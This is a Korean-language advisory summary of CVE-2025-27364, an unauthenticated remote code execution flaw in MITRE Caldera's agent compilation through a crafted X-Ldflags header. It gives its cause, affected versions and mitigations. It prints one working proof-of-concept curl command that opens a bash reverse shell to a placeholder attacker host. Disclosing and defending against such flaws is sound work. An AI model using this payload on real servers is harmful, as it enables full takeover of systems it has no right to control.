MITRE Caldera에서 발견된 치명적 원격 코드 실행(RCE) 취약점(CVE-2025-27364)

Critical RCE Vulnerability in MITRE Caldera – Proof of Concept Released

Critical RCE Vulnerability in MITRE Caldera – Proof of Concept Released

 

• 공격 개요
  • MITRE Caldera, 공격자 에뮬레이션 프레임워크에서 원격 코드 실행(RCE) 취약점(CVE-2025-27364) 발견
  • v5.1.0 이전의 모든 버전이 영향을 받음
  • 공격자는 Sandcat 및 Manx 에이전트의 동적 컴파일 기능을 악용하여 임의 명령어 실행 가능
  • MITRE는 즉각적인 업데이트를 권고
• 기술적 분석
  • 취약점은 입력 값 검증 부족으로 발생
  • Caldera는 Sandcat 및 Manx 에이전트를 HTTP 헤더를 통해 전달된 사용자 매개변수로 동적으로 컴파일
  • 이러한 유연성이 공격 표면을 확대시킴
  • 동적 컴파일 및 명령어 주입
    • Go 언어 기반의 compile_go() 함수에서 ldflags를 처리할 때 발생
    • subprocess.check_output()을 사용하지만 shell=True가 설정되지 않아도, ldflags 처리에서 위험 요소 발생
    • -wrapper 플래그를 사용하여 GCC 외부 링크 설정을 악용
    • 예: python3 -c 명령어를 사용하여 악성 명령어 실행 가능
• 취약점 세부 정보
  • CVE ID: CVE-2025-27364
  • CVSS 점수: 9.8 (치명적)
  • 영향받는 버전: commit 35bc06e 이전의 모든 버전
  • 패치 버전: Caldera v5.1.0 이상
  • 공격 벡터: 원격, 인증 필요 없음
  • 영향: 전체 시스템 탈취(RCE)
• PoC(개념 증명) 예시
  • 이 명령어를 통해 Caldera 서버에서 역방향 쉘(reverse shell)을 활성화
  • 루트 권한으로 원격 제어 가능
• curl -X POST http://<caldera-server>:8888/file/compile \ -H "X-Request-Hash: arbitrary" \ -H "X-Goos: linux" \ -H "X-Goarch: amd64" \ -H "X-Ldflags: -extld=gcc -wrapper python3,-c,import os;os.system(\"bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1'\")"
• 보안 권고
  • 즉각적 업데이트: Caldera v5.1.0 이상으로 업데이트
    • 링커 플래그 수정 제한 및 컴파일 매개변수 검증 강화
  • 네트워크 분리: Caldera 서버를 민감 환경과 격리
  • 의존성 강화: 생산 시스템에서 불필요한 빌드 도구(GCC) 제거
  • 침해 징후(IOC) 확인: Caldera 호스트에서의 비정상적 프로세스 또는 네트워크 연결 탐지
• 결론
  • CVE-2025-27364는 동적 코드 생성의 위험성을 보여줌
  • MITRE의 빠른 대응은 오픈 소스 프로젝트의 유지 관리 모범 사례를 제시
  • 적대적 에뮬레이션 플랫폼의 보안 검토 지속 필요성 강조